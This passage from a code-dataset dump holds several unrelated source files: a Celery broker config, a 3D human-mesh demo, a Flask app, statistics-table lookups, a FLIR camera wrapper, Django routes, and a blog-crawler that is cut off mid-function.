gpu.toReplaceWith(siPixelClustersPreSplitting, _siPixelClustersHeterogeneous.clone())
|
987,183 | 116ebb7f9487cf80fa9efa45fe2713274a996517 | import logging
import os
from celery import Celery
# Configuration knobs, each overridable via a TIX_* environment variable.
REPORTS_BASE_PATH = os.environ.get('TIX_REPORTS_BASE_PATH', '/tmp/reports')
PROCESSING_PERIOD = int(os.environ.get('TIX_PROCESSING_PERIOD', '5'))
RABBITMQ_USER = os.environ.get('TIX_RABBITMQ_USER', 'guest')
RABBITMQ_PASS = os.environ.get('TIX_RABBITMQ_PASS', 'guest')
RABBITMQ_HOST = os.environ.get('TIX_RABBITMQ_HOST', 'localhost')
RABBITMQ_PORT = os.environ.get('TIX_RABBITMQ_PORT', '5672')
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
# Celery application using RabbitMQ as the AMQP broker.
app = Celery('processor.tasks',
             broker='amqp://{rabbitmq_user}:{rabbitmq_pass}@{rabbitmq_host}:{rabbitmq_port}//'.format(
                 rabbitmq_user=RABBITMQ_USER,
                 rabbitmq_pass=RABBITMQ_PASS,
                 rabbitmq_host=RABBITMQ_HOST,
                 rabbitmq_port=RABBITMQ_PORT
             ))
|
987,184 | 49d1a40d9b8595286881d0cdb84a1f803299b6f4 | import os
import sys
import os.path as osp
import argparse
import numpy as np
import torchvision.transforms as transforms
import torch.backends.cudnn as cudnn
import torch
sys.path.insert(0, osp.join('..', 'main'))
sys.path.insert(0, osp.join('..', 'data'))
from config import cfg
import cv2
def parse_args():
    """Parse the demo's command-line arguments.

    A GPU id range such as '0-2' is expanded to the comma list '0,1,2'.
    Returns the argparse Namespace.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--gpu', type=str, dest='gpu_ids', default='0')
    parser.add_argument('--img_path', type=str, default='input.png')
    parser.add_argument('--output_folder', type=str, default='output')
    parser.add_argument('--encoder_setting', type=str, default='osx_l', choices=['osx_b', 'osx_l'])
    parser.add_argument('--decoder_setting', type=str, default='normal', choices=['normal', 'wo_face_decoder', 'wo_decoder'])
    parser.add_argument('--pretrained_model_path', type=str, default='../pretrained_models/osx_l.pth.tar')
    args = parser.parse_args()

    # test gpus
    if not args.gpu_ids:
        # The original `assert 0, print(...)` raised AssertionError with a
        # None message and is silently stripped under `python -O`; report
        # the usage error through argparse instead.
        parser.error("Please set proper gpu ids")
    if '-' in args.gpu_ids:
        # Expand an inclusive range 'a-b' into 'a,a+1,...,b'.
        begin, end = map(int, args.gpu_ids.split('-'))
        args.gpu_ids = ','.join(str(i) for i in range(begin, end + 1))
    return args
args = parse_args()
cfg.set_args(args.gpu_ids)
cudnn.benchmark = True

# load model
cfg.set_additional_args(encoder_setting=args.encoder_setting, decoder_setting=args.decoder_setting, pretrained_model_path=args.pretrained_model_path)
from common.base import Demoer
demoer = Demoer()
demoer._make_model()
from common.utils.preprocessing import load_img, process_bbox, generate_patch_image
from common.utils.vis import render_mesh, save_obj
from common.utils.human_models import smpl_x
model_path = args.pretrained_model_path
assert osp.exists(model_path), 'Cannot find model at ' + model_path
print('Load checkpoint from {}'.format(model_path))
demoer.model.eval()

# prepare input image
transform = transforms.ToTensor()
original_img = load_img(args.img_path)
original_img_height, original_img_width = original_img.shape[:2]
os.makedirs(args.output_folder, exist_ok=True)

# detect human bbox with yolov5s
detector = torch.hub.load('ultralytics/yolov5', 'yolov5s', pretrained=True)
with torch.no_grad():
    results = detector(original_img)
# Column 5 of the yolov5 xyxy output is the class id; 0 selects what the
# code treats as person detections (per the variable name) -- TODO confirm.
person_results = results.xyxy[0][results.xyxy[0][:, 5] == 0]
class_ids, confidences, boxes = [], [], []
for detection in person_results:
    x1, y1, x2, y2, confidence, class_id = detection.tolist()
    class_ids.append(class_id)
    confidences.append(confidence)
    # Convert corner coordinates to (x, y, width, height).
    boxes.append([x1, y1, x2 - x1, y2 - y1])
# Non-maximum suppression to drop overlapping person boxes.
indices = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.4)
vis_img = original_img.copy()
# Run mesh recovery once per surviving detection.
for num, indice in enumerate(indices):
    bbox = boxes[indice]  # x,y,h,w
    bbox = process_bbox(bbox, original_img_width, original_img_height)
    img, img2bb_trans, bb2img_trans = generate_patch_image(original_img, bbox, 1.0, 0.0, False, cfg.input_img_shape)
    img = transform(img.astype(np.float32))/255
    img = img.cuda()[None,:,:,:]
    inputs = {'img': img}
    targets = {}
    meta_info = {}

    # mesh recovery
    with torch.no_grad():
        out = demoer.model(inputs, targets, meta_info, 'test')
    mesh = out['smplx_mesh_cam'].detach().cpu().numpy()
    mesh = mesh[0]

    # save mesh
    save_obj(mesh, smpl_x.face, os.path.join(args.output_folder, f'person_{num}.obj'))

    # render mesh
    # Scale the camera intrinsics from model input space back to bbox space.
    focal = [cfg.focal[0] / cfg.input_body_shape[1] * bbox[2], cfg.focal[1] / cfg.input_body_shape[0] * bbox[3]]
    princpt = [cfg.princpt[0] / cfg.input_body_shape[1] * bbox[2] + bbox[0], cfg.princpt[1] / cfg.input_body_shape[0] * bbox[3] + bbox[1]]
    vis_img = render_mesh(vis_img, mesh, smpl_x.face, {'focal': focal, 'princpt': princpt})

# save rendered image (RGB -> BGR for OpenCV)
cv2.imwrite(os.path.join(args.output_folder, f'render.jpg'), vis_img[:, :, ::-1])
|
987,185 | b2acc591ebd1f1e9bf281eff238563e93b537748 | #!/usr/bin/python3
"""Flask app module"""
from models import storage
from flask import Flask, render_template
from os import environ
app = Flask(__name__)
@app.teardown_appcontext
def teardown_session(session):
    """ Remove current session """
    # Runs after every request; closes the storage engine's session.
    storage.close()
@app.route('/states', strict_slashes=False)
@app.route('/states/<id>', strict_slashes=False)
def hbnb_states_byID_route(id=None):
    """ List all state objects present in database by states_id"""
    from models.state import State
    states = storage.all(State).values()
    if id:
        # Render the single-state page; desired_state is None when not found.
        matching = next((state for state in states if state.id == id), None)
        return render_template("9-states.html", desired_state=matching)
    return render_template("8-cities_by_states.html", all_states=states)
if __name__ == '__main__':
    environ['FLASK_APP'] = __file__
    # Bind to all interfaces so the app is reachable from outside the host.
    app.run(host='0.0.0.0', port=5000)
|
987,186 | 73dd6b44edcc3c255763ba7fe2a4c01be56600a6 | # -*- coding: utf-8 -*-
"""
Created on Sun Feb 05 15:14:33 2017
@author: Kristian
"""
import IPython.lib.latextools as latextools
import IPython.display as display
# Optional dependency: fall back to a stub that fails loudly when called.
try:
    from table2ascii import table2ascii
except ImportError:
    print("----------WARNING----------")
    print("WARNING: module table2ascii not found you can download it here:")
    print("https://github.com/Snaipe/table2ascii")
    print("---------------------------")

    def table2ascii(*args):
        # NotImplemented is a comparison sentinel, not an exception class;
        # raising it is itself a TypeError. NotImplementedError is correct.
        raise NotImplementedError("You need to download table2ascii from here: https://github.com/Snaipe/table2ascii")
import matplotlib.pyplot as plt
import sympy
from sympy import *
from sympy.stats import Chi, Normal, density, E, P, variance
from sympy import E as e
from scipy.stats import norm as sci_norm #Normal distribution
from scipy.stats import t as sci_t #t distribution
from scipy.stats import chi2 as sci_chi2 #chi^2 distribution
from scipy.stats import f as sci_f #F distribution
x, y, z, a, b, lamda, theta, r = symbols("x y z a b lamda theta r")
init_printing()
class SETTINGS(object):
    """Container for module-wide tunables."""
    def __init__(self):
        # min_confidence: default significance level used by this module.
        self.min_confidence = 0.05 #5%

# Shared settings instance for the module.
settings = SETTINGS()
#So buggy it can almost be considered useless
class PrintLatex(object):
    """Render a LaTeX snippet inline in IPython; displays itself on construction."""
    def __init__(self, lat):
        self.lat = lat
        display.display(self)
    def _repr_png_(self):
        # IPython rich-display hook: rasterize the LaTeX to PNG bytes.
        return latextools.latex_to_png(self.lat)
def max_1_none(*args):
    """Guard: allow at most one of *args to be None.

    Raises Exception when two or more arguments are None. Returns True
    otherwise (callers ignore the return value). The original had an
    unreachable `return False` after the raise and compared with `== None`.
    """
    none_count = sum(1 for arg in args if arg is None)
    if none_count > 1:
        raise Exception("Maximum 1 None parameter allowed")
    return True
#Page 1 in statistical tables
def phi(x):
    """Standard normal CDF, Phi(x), as a sympy number (ST page 1)."""
    x = float(x)
    return sympify(sci_norm.cdf(x))
def solve_phi(phi_value=None, x=None):
    """Solve Phi(x) = phi_value for whichever argument is None."""
    max_1_none(phi_value, x)
    if phi_value == None:
        #We solve for phi, which is easy:
        return phi(x)
    elif x == None:
        # Invert via the normal percent-point function (quantile).
        return sympify(sci_norm.ppf(float(phi_value)))
#Page 2-4 in statistical tables
def phi_inverse(p):
    """p-fractile of the standard normal distribution, Phi^-1(p) (ST pages 2-4)."""
    p = float(p)
    return sympify(sci_norm.ppf(p))
def solve_phi_inverse(phi_inverse_value=None, p=None):
    """Solve Phi^-1(p) = phi_inverse_value for whichever argument is None."""
    max_1_none(phi_inverse_value, p)
    if phi_inverse_value == None:
        return phi_inverse(p)
    elif p == None:
        # The inverse of the quantile function is the CDF.
        return sympify(sci_norm.cdf(float(phi_inverse_value)))
#Page 5 in statistical tables
def t(f, p):
    """p-fractile of Student's t distribution with f degrees of freedom (ST page 5)."""
    p = float(p)
    f = float(f)
    return sympify(sci_t.ppf(p, f))
def solve_t(t_value=None, f=None, p=None):
    """Solve t_p(f) = t_value for whichever argument is None (ST page 5).

    Solving for the degrees of freedom `f` is not supported.
    """
    max_1_none(t_value, f, p)
    if t_value is None:
        return t(f, p)
    elif f is None:
        # NotImplemented is a sentinel value, not an exception class;
        # raising it would itself be a TypeError. Use NotImplementedError.
        raise NotImplementedError("Not implemented yet - sorry")
    elif p is None:
        return sympify(sci_t.cdf(float(t_value), float(f)))
#Page 6-9 in statistical tables
def chi_squared(f, p):
    """p-fractile of the chi-squared distribution with f degrees of freedom (ST pages 6-9)."""
    f = float(f)
    p = float(p)
    return sympify(sci_chi2.ppf(p, f))
def solve_chi_squared(chi_squared_value=None, f=None, p=None):
    """Solve chi^2_p(f) = chi_squared_value for whichever argument is None
    (ST pages 6-9). Solving for the degrees of freedom `f` is not supported.
    """
    max_1_none(chi_squared_value, f, p)
    if chi_squared_value is None:
        return chi_squared(f, p)
    elif f is None:
        # NotImplemented is a sentinel value, not an exception class;
        # raising it would itself be a TypeError. Use NotImplementedError.
        raise NotImplementedError("Not implemented yet - sorry")
    elif p is None:
        return sympify(sci_chi2.cdf(float(chi_squared_value), float(f)))
#Page 14-49 in statistical tables
def f(f1, f2, p):
    """p-fractile of the F distribution with (f1, f2) degrees of freedom (ST pages 14-49)."""
    f1 = float(f1)
    f2 = float(f2)
    p = float(p)
    return sympify(sci_f.ppf(p, f1, f2))
def solve_f(f_value=None, f1=None, f2=None, p=None):
    """Solve F_p(f1, f2) = f_value for whichever argument is None
    (ST pages 14-49). Solving for f1 or f2 is not supported.
    """
    max_1_none(f_value, f1, f2, p)
    if f_value is None:
        return f(f1, f2, p)
    elif p is None:
        return sympify(sci_f.cdf(float(f_value), float(f1), float(f2)))
    else:
        # NotImplemented is a sentinel value, not an exception class;
        # raising it would itself be a TypeError. Use NotImplementedError.
        raise NotImplementedError("Not implemented yet - sorry")
##UNGROUPED VARIABLES
def fractile_diagram_table(data):
    """Print an ASCII fractile-diagram table for a list of observations.

    Columns: observation y, count a, cumulative count k, probability p in %
    and the corresponding normal p-fractile u_p. Requires table2ascii.
    """
    data = [sympify(dat) for dat in data]
    # Table skeleton in the layout table2ascii expects.
    TABLE = {
        'node': 'table',
        'colspec': [20, 9, 15, 15, 20],
        'rowspec': [2, 1, 1, 1, 1, 1],
        'children': [
            {
                'node': 'head',
                'children': [
                    {
                        'node': 'row',
                        'children': [
                            {'node': 'cell', 'data': 'Observation'},
                            {'node': 'cell', 'data': 'Number'},
                            {'node': 'cell', 'data': 'Cumulative number'},
                            {'node': 'cell', 'data': 'Probability in %'},
                            {'node': 'cell', 'data': 'p Fractile'}
                        ]
                    },
                    {
                        'node': 'row',
                        'children': [
                            {'node': 'cell', 'data': 'y'},
                            {'node': 'cell', 'data': 'a'},
                            {'node': 'cell', 'data': 'k'},
                            {'node': 'cell', 'data': 'p in %'},
                            {'node': 'cell', 'data': 'u_p'},
                        ]
                    }
                ]
            },
            {
                'node': 'body',
                'children': []
            }
        ]
    }
    n = len(data)
    # Count multiplicity of each distinct observation.
    observations = {}
    for d in data:
        if d in observations.keys():
            observations[d] += 1
        else:
            observations[d] = 1
    obsess = sorted(observations.keys())
    y = []
    a = []
    k = []
    pp = []
    pf = []
    # First row: cumulative count equals its own count.
    y.append(obsess[0])
    a.append(observations[obsess[0]])
    k.append(a[0])
    pp.append(100 * (k[0] / sympify(2*n)))
    p = (k[0] / sympify(2*n)).evalf()
    pf.append(phi_inverse(p))
    i = 1
    # Remaining rows: probability uses the average of adjacent cumulative counts.
    for observation in obsess[1:]:
        y.append(observation)
        a.append(observations[observation])
        s = 0
        for v in range(i):
            s += a[v]
        k.append(a[i] + s)
        pp.append(100 * ((k[i] + k[i-1]) / sympify(2*n)))
        p = (((k[i] + k[i-1]) / sympify(2*n))).evalf()
        pf.append(phi_inverse(p))
        i += 1
    rows = len(observations.keys())
    TABLE["rowspec"] = [2, 1] + [1 for i in range(rows)]
    for i in range(rows):
        node = {
            'node': 'row',
            'children': [
                {'node': 'cell', 'data': str(y[i])},
                {'node': 'cell', 'data': str(a[i])},
                {'node': 'cell', 'data': str(k[i])},
                {'node': 'cell', 'data': str(pp[i].evalf(6))},
                {'node': 'cell', 'data': str(pf[i])}
            ]
        }
        TABLE["children"][1]["children"].append(node)
    print(table2ascii(TABLE))
def unit_test():
    """Smoke-test the statistical-table lookup helpers against known values."""
    # Fixed: the original wrote `assert str(phi(0) == "0.5")`, which stringifies
    # a boolean and is always truthy; the comparison belongs outside str().
    # A [:3] slice is used, matching the style of the other asserts.
    assert str(phi(0))[:3] == "0.5"
    assert str(phi(1.99))[:5] == "0.976"
    assert str(phi(-1.09))[:5] == str(1 - 0.8621)[:5]
    assert str(solve_phi(x=0.95)) == str(phi(0.95))
    assert str(solve_phi(phi_value=0.8315))[:5] == "0.960"
    assert str(phi_inverse(0.205))[:5] == "-0.82"
    assert str(phi_inverse(0.999))[:5] == "3.090"
    assert str(phi_inverse(0.9999))[:5] == "3.719"
    assert str(solve_phi_inverse(p=0.404)) == str(phi_inverse(0.404))
    assert str(solve_phi_inverse(phi_inverse_value=solve_phi_inverse(p=0.404)))[:5] == "0.404"
    assert str(t(23, 0.9))[:5] == "1.319"
    assert str(t(130, 0.9))[:5] == "1.288"
    assert str(t(130, 0.1))[:15] == str(-t(130, 0.9))[:15]
    assert str(solve_t(t_value=2.086, f=20))[:5] == "0.975"
    assert str(chi_squared(10, 0.2))[:5] == "6.179"
    assert solve_chi_squared(chi_squared_value=None, f=10, p=0.2) == chi_squared(10, 0.2)
    assert str(solve_chi_squared(chi_squared_value=11.1, f=13, p=None))[:5] == "0.397"
    assert str(f(500, 10, 0.9))[:4] == "2.06"
    assert str(f(500, 500, 0.5))[:4] == "1.00"
    assert str(solve_f(1.11,60, 6))[:4] == "0.50"
    print("All unit tests passed")
# Example invocation kept for reference:
#fractile_diagram_table([6.3,7.1,7.4,6.8,7.1,7.8,6.9,7.3,7.7,7.3])
# Self-check on import, then print a usage banner for interactive sessions.
unit_test()
print("Successfully set up")
print("For all methods called 'solve_x(param1=None, param2=None, ...)' you need to supply all but one parameter to solve for the None parameter")
print("\n\n")
print("--- Fractile diagrams ---")
print("\tUse 'fractile_diagram_table(data)' to generate the table on p.31 (data is a list of observations)")
PrintLatex("$\Phi$")
print("---Phi lookups: page 1 in ST ---")
print("\t'phi(x)'")
print("\t'solve_phi(phi_value=None, x=None)'")
PrintLatex("$\Phi^{-1}$")
print("--- Phi^-1 lookups: page 2-4 in ST ---")
print("\tUse 'phi_inverse(p)' (remember that p < 1)")
print("\tUse 'solve_phi_inverse(phi_inverse_value=None, p=None)'")
PrintLatex("$t_p(f)$")
print("--- t lookups: page 5 in ST ---")
print("\tUse 't(f, p)'")
print("\tUse 'solve_t(t_value=None, f=None, p=None)'")
PrintLatex("$\chi^2_p(f)$")
print("--- chi^2 lookups: page 6-9 in ST ---")
print("\tUse 'chi_squared(f, p)'")
print("\tUse 'solve_chi_squared(chi_squared_value=None, f=None, p=None)'")
PrintLatex("$F_p(f_1, f_2)$")
print("--- F lookups: page 14-49 in ST ---")
print("\tUse 'f(f1, f2, p)'")
print("\tUse 'solve_f(f_value=None, f1=None, f2=None, p=None)'")
987,187 | 519115df9f1f69248079d9f3c08a47c54bc3070c | # # Python Class for FLIR Systems' Blackfly USB Camera
#
# By Chris Arcadia (2021/01/11)
#
# Intended for use with the Blackfly S USB3 Camera
#
# Inspired by the following Repositories:
# * "Acquisition.py" (from "Spinnaker-Python3-Examples" by FLIR Systems, in Python, in [firmware download](https://flir.custhelp.com/app/account/fl_downloads))
# * "Enumeration.py" (from "Spinnaker-Python3-Examples" by FLIR Systems, in Python, in [firmware download](https://flir.custhelp.com/app/account/fl_downloads))
import time
import numpy
import os
import PySpin
from matplotlib import pyplot
class BlackFlyPy():
    """Thin wrapper around PySpin for FLIR Blackfly S USB3 cameras.

    On construction it acquires the Spinnaker system singleton and enumerates
    interfaces and cameras; individual cameras are then initialized and
    queried by index. PySpin failures are deliberately swallowed throughout
    (best-effort hardware access) — methods return None/empty on error.
    """
    def __init__(self):
        self.load_options()
        self.load_constants()
        self.set_path()
        self.initialize_system()
        self.load_system_info()
    def load_options(self):
        self.verbose = True  # gate for notify() console output
        self.record = True # unimplemented option to save each read step or position value to text (along with a timestamp)
    def load_constants(self):
        # load constants specific to Blackfly
        self.hardware = {
            'interface':'USB 3',
            'manufacturer': 'FLIR Systems',
            'camera':'Blackfly S',
        } # known hardware details
        self.units = {
            'time': 's',
        }
    def set_path(self,pathOut=None):
        # Resolve the output directory; defaults to __temporary__ next to this file.
        self.path = dict();
        self.path['root'] = os.path.dirname(__file__)
        if not pathOut:
            # provide default output path
            pathOut = os.path.join(self.path['root'],'__temporary__')
            self.ensure_path(pathOut)
        self.path['output'] = pathOut
    def ensure_path(self,path):
        # Create the directory if missing (single level only, not makedirs).
        if not os.path.isdir(path):
            os.mkdir(path)
    def notify(self,message):
        # Console logging, gated by self.verbose.
        if self.verbose:
            print('BlackFlyPy: '+message)
    def initialize_system(self):
        self.get_system()
        self.get_interfaces()
        self.get_cameras()
    def get_system(self):
        """Acquire the Spinnaker system singleton; sets self.loaded."""
        try:
            self.system = PySpin.System.GetInstance()
            self.loaded = True
            self.notify('System initialized with library version '+self.get_library_version())
        except:
            self.system = None
            self.loaded = False
    def get_library_version(self):
        """Return the Spinnaker library version as 'major.minor.type.build', or None."""
        version = None
        if self.loaded:
            version = self.system.GetLibraryVersion()
            version = '%d.%d.%d.%d' % (version.major, version.minor, version.type, version.build)
        return version
    def get_interfaces(self):
        """Enumerate host interfaces (USB buses etc.); stores and returns the list."""
        self.interfaces = None
        if self.loaded:
            try:
                self.interfaces = self.system.GetInterfaces()
                self.notify('Found %i interfaces.' % self.about_interfaces()['count'])
            except:
                pass
        return self.interfaces
    def about_interfaces(self):
        """Summarize the enumerated interfaces as {count, name[], index[]}."""
        info = {'count':0,'name':[],'index':[]}
        if self.loaded and self.interfaces:
            info['count'] = self.interfaces.GetSize()
            info['index'] = list(range(info['count']))
            for interface in self.interfaces:
                nodemap = interface.GetTLNodeMap()
                name = self.get_nodemap_property(nodemap,'InterfaceDisplayName')
                info['name'].append(name)
        return info
    def clear_interfaces(self):
        if self.loaded and self.interfaces:
            self.interfaces.Clear()
    def get_nodemap_property(self,nodemap,field):
        """Read a string node from a PySpin nodemap; None if absent/unreadable."""
        value = None
        try:
            ptr = PySpin.CStringPtr(nodemap.GetNode(field))
            if PySpin.IsAvailable(ptr) and PySpin.IsReadable(ptr):
                value = ptr.GetValue()
        except:
            pass
        return value
    def get_cameras(self):
        """Enumerate attached cameras; stores and returns the camera list."""
        self.cameras = None
        if self.loaded:
            try:
                self.cameras = self.system.GetCameras()
                self.notify('Detected %i cameras.' % self.about_cameras()['count'])
            except:
                pass
        return self.cameras
    def about_cameras(self):
        """Summarize the detected cameras as {count, name[], index[], vendor[]}."""
        info = {'count':0,'name':[],'index':[],'vendor':[]}
        if self.loaded and self.cameras:
            info['count'] = self.cameras.GetSize()
            info['index'] = list(range(info['count']))
            for camera in self.cameras:
                nodemap = camera.GetTLDeviceNodeMap()
                vendor = self.get_nodemap_property(nodemap,'DeviceVendorName')
                model = self.get_nodemap_property(nodemap,'DeviceModelName')
                info['name'].append(model)
                info['vendor'].append(vendor)
        return info
    def clear_cameras(self):
        if self.loaded and self.cameras:
            self.cameras.Clear()
    def get_system_info(self):
        info = dict()
        info['libraryVersion'] = self.get_library_version()
        info['interfaces'] = self.about_interfaces()
        info['cameras'] = self.about_cameras()
        return info
    def load_system_info(self):
        self.info = self.get_system_info()
    def release(self):
        # Must be called before dropping the instance: Spinnaker requires the
        # camera/interface lists be cleared before releasing the system.
        if self.loaded:
            self.clear_cameras()
            self.clear_interfaces()
            self.system.ReleaseInstance()
    def initialize_camera(self,index=0):
        if self.loaded and self.cameras and index<self.about_cameras()['count']:
            try:
                camera = self.cameras[index]
                camera.Init()
            except:
                pass
    def deinitialize_camera(self,index=0):
        if self.loaded and self.cameras and index<self.about_cameras()['count']:
            try:
                camera = self.cameras[index]
                camera.DeInit()
            except:
                pass
    def get_camera_information(self,index=0):
        """Read the DeviceInformation category of camera *index* into a dict."""
        info = dict()
        if self.loaded and self.cameras and index<self.about_cameras()['count']:
            try:
                camera = self.cameras[index]
                nodemap = camera.GetTLDeviceNodeMap()
                info_ptr = PySpin.CCategoryPtr(nodemap.GetNode('DeviceInformation'))
                if PySpin.IsAvailable(info_ptr) and PySpin.IsReadable(info_ptr):
                    features = info_ptr.GetFeatures()
                    for feature in features:
                        ptr = PySpin.CValuePtr(feature)
                        if PySpin.IsReadable(ptr):
                            field = ptr.GetName()
                            value = ptr.ToString()
                            info.update({field:value})
            except:
                pass
        return info
    def get_camera_image(self,index=0,timeout=1): # timeout specified in seconds
        """Grab one frame; returns [ndarray_or_None, info_dict].

        Also saves a Mono8 JPEG of the frame into self.path['output'].
        """
        info = dict()
        data = None
        if self.loaded and self.cameras and index<self.about_cameras()['count']:
            try:
                camera = self.cameras[index]
                nodemap = camera.GetTLDeviceNodeMap()
                serial = self.get_nodemap_property(nodemap,'DeviceSerialNumber')
                filename = 'Image-'+str(serial)+'-'+'.jpg'
                fullfilename = os.path.join(self.path['output'],filename)
                self.notify('Starting image acquisition.')
                camera.BeginAcquisition()
                try:
                    image = camera.GetNextImage(round(timeout*1e3))  # PySpin timeout is in ms
                    if image.IsIncomplete():
                        self.notify('Image incomplete with image status %d ...' % image.GetImageStatus())
                    else:
                        info = {'width':image.GetWidth(),
                                'height':image.GetHeight(),
                                'timestamp':image.GetTimeStamp(), # time stamp is in nanoseconds
                                }
                        data = image.GetNDArray()
                        image_converted = image.Convert(PySpin.PixelFormat_Mono8, PySpin.HQ_LINEAR)
                        image_converted.Save(fullfilename)
                        self.notify('Image captured with the following details: \n' + str(info))
                        # NOTE(review): incomplete images are never Release()d on
                        # this path — possible buffer leak; confirm against the
                        # Spinnaker Acquisition.py example.
                        image.Release()
                except:
                    pass
                self.notify('Ending image acquisition.')
                camera.EndAcquisition()
            except:
                pass
        return [data,info]
if __name__ == "__main__":
    # set camera ID to the first available camera
    cid = 0
    # instantiate class
    blackfly = BlackFlyPy()
    # get device info
    info = blackfly.get_camera_information(index=cid)
    print('Selected Device Info: \n'+str(info))
    # acquire images
    blackfly.initialize_camera(index=cid)
    result = blackfly.get_camera_image(index=cid)
    # Fixed: `if result[0]:` truth-tested a multi-element numpy array, which
    # raises "truth value of an array ... is ambiguous"; compare against None.
    if result[0] is not None:
        pyplot.imshow(result[0], cmap='gray')
    blackfly.deinitialize_camera(index=cid)
    # todo:
    # - set image acquired exposure and gain
    # - clean-up get_camera_image method
    # - append desired image metadata to image or associated text file
# -*- coding: utf-8 -*-
|
987,188 | 7873c5e657f3e904989d557706f9aad6da6485e6 | from django.urls import include, path
from rest_framework import routers
from . import views
# DRF router exposing the pc viewset under the 'api/' prefix.
router = routers.DefaultRouter()
router.register(r'api', views.pcViewSet)
# NOTE(review): both patterns share the '' prefix — the index view wins for the
# exact root URL, while router URLs ('api/...') resolve via the include.
urlpatterns = [
    path('', views.index, name='index'),
    path('', include(router.urls)),
]
|
987,189 | 7b0f0198875b3281f804c15fcfb7be1be26eaa01 | import os
import requests
import re
from dataclasses import dataclass
from urllib.parse import urljoin
from urllib.parse import urlparse
from requests_html import AsyncHTMLSession
# from requests_html import HTMLSession
from utils import PASS_DOMAIN, geuss_link_url, rm_slash, has_url_html_been_fetched
from itertools import chain
from schema import SiteInfoItem
from is_site_a_zh_i9t_blog import test
# Shared async HTML session with an enlarged connection pool so many sites
# can be fetched concurrently.
asession = AsyncHTMLSession()
adapter = requests.adapters.HTTPAdapter(pool_connections=100, pool_maxsize=100)
asession.mount('http://', adapter)
asession.mount('https://', adapter)
# Regexes for blog-feature detection: CJK text plus English/Chinese markers
# for archive/tag/category/about/theme/blog sections.
re_zh_text = zh_re = re.compile('[\u4e00-\u9fa5]')
re_archive_zh = re.compile('归档')
re_archive_en = re.compile('archive')
re_tag_zh = re.compile('标签')
re_tag_en = re.compile('tag')
re_cate_zh = re.compile('分类')
re_cate_en = re.compile('categor')
re_about_zh = re.compile('关于')
re_about_en = re.compile('about')
re_theme_en = re.compile('theme')
re_blog_text_zh = re.compile('博客')
re_blog_text_en = re.compile('blog')

# Feature name -> patterns; a feature fires if ANY pattern matches the page text.
re_map = {
    # Fixed: has_archive/has_tag were wrongly paired with re_about_zh
    # (copy-paste bug), so the Chinese markers 归档/标签 were never matched.
    "has_archive": [re_archive_en, re_archive_zh],
    "has_tag": [re_tag_en, re_tag_zh],
    "has_category": [re_cate_en, re_cate_zh],
    "has_about": [re_about_zh, re_about_en],
    "has_theme": [re_theme_en],
    "has_zh_text": [re_zh_text],
    "has_blog_text": [re_blog_text_en, re_blog_text_zh]
}

# Titles containing these keywords are almost never personal blogs.
BLACK_WORDS = {"SEO", "官方", "导航", "网址"}
class SiteFeatureTransformer:
    """Extract classification features and metadata from a fetched page.

    Wraps a requests_html response *r* for *url* plus its outbound friend
    links, and exposes the feature dict consumed by the blog classifier.
    """
    def __init__(self, url, r, friends):
        self.text = r.html.text
        self.r = r
        self.url = url
        self.friends = friends
    @property
    def domain(self):
        # Full host, e.g. 'blog.example.com'.
        return urlparse(self.url).netloc
    @property
    def tld(self):
        # Last dotted label of the host (top-level domain).
        return self.domain.split(".")[-1]
    @property
    def sld(self):
        # Second-level domain label.
        return self.domain.split(".")[-2]
    @property
    def name(self):
        # Page <title>, or 'unknown' when absent.
        title = self.r.html.find('title', first=True)
        if title:
            return title.text
        else:
            return 'unknown'
    @property
    def rss(self):
        # RSS detection is not implemented yet; always empty.
        pass
        return ""
    @property
    def generator(self):
        # Site generator: prefer <meta name="generator">, then a
        # "Powered by <a>...</a>" pattern in the HTML; 'unknown' otherwise.
        find_in_meta = self.r.html.find("meta[name='generator']", first=True)
        if find_in_meta:
            return find_in_meta.attrs.get('content', 'unknown')
        find_in_html_text = self.r.html.search("Powered by{}<a{}>{}</a>")
        if find_in_html_text:
            return find_in_html_text[2]
        else:
            return 'unknown'
    @property
    def feature(self):
        # Boolean regex features from re_map plus derived has_* flags.
        feature_has = {k: any([re_item.search(self.text)
                               for re_item in res]) for k, res in re_map.items()}
        feature_has["has_generator"] = bool(self.generator != 'unknown')
        feature_has["has_rss"] = bool(self.rss)
        feature = {
            "len_friends": len(self.friends),
            # "tld": self.tld,
            # "sld": self.sld,
        }
        return {**feature_has, **feature}
    def to_data(self):
        """Merge features with site metadata into one flat dict (SiteInfoItem kwargs)."""
        feature = self.feature
        data = {
            "domain": self.domain,
            "name": self.name,
            "rss": self.rss,
            "generator": self.generator,
            "friends": self.friends,
            "url": self.url,
            "tld": self.tld,
            "sld": self.sld
        }
        return {**feature, **data}
def save_html(domain, html):
    """Persist a page's HTML to html/<domain>.html (UTF-8).

    Fixed: creates the 'html' directory if missing, and writes with an
    explicit UTF-8 encoding so Chinese pages don't fail on locale defaults.
    """
    os.makedirs('html', exist_ok=True)
    path = os.path.join('html', f'{domain}.html')
    with open(path, 'w', encoding='utf-8') as f:
        f.write(html)
def get_data(urls):
    """Fetch each url, keep only pages classified as Chinese personal blogs,
    archive their HTML, and return the resulting SiteInfoItem list."""
    res = get_frineds_and_res(urls)
    data = []
    for url, friends, r in res:
        site_feature = SiteFeatureTransformer(r=r, url=url, friends=friends)
        # Require visible Chinese text AND a positive classifier verdict.
        if site_feature.feature['has_zh_text'] and test(site_feature.feature) :
            site = SiteInfoItem(**site_feature.to_data())
            save_html(site.domain, str(r.html.html))
            data.append(site)
        else:
            print('{} maybe not personal zh blog'.format(url))
    return data
def get_url_html(url):
    """Return an async closure that GETs *url* (10 s timeout).

    Failures are swallowed and yield None — unreachable sites are simply
    skipped by the caller.
    """
    async def f():
        # print("get:{}".format(url))
        try:
            r = await asession.get(url, timeout=10)
            return r
        except requests.exceptions.ConnectTimeout:
            # print("{} timed out, unreachable".format(url))
            pass
        except:
            pass
            # print("{} connection error, unreachable".format(url))
    return f
def get_frineds_and_res(urls):
    """Find each url's friend-link list; return (url, friends, index html) triples.

    Candidate link pages are guessed per url, fetched concurrently, then each
    response is matched back to its site by netloc. Friend links are the page's
    absolute root links minus PASS_DOMAIN and the site's own domain.
    """
    # Skip urls whose HTML was already archived in a previous run.
    urls = [url for url in urls if not has_url_html_been_fetched(url)]
    all_urls = list(chain(*[geuss_link_url(url) for url in urls]))
    res = []
    try:
        results = asession.run(*[get_url_html(url)
                                 for url in all_urls])
        for url in urls:
            friends = []
            index_rhtml = None
            for r in results:
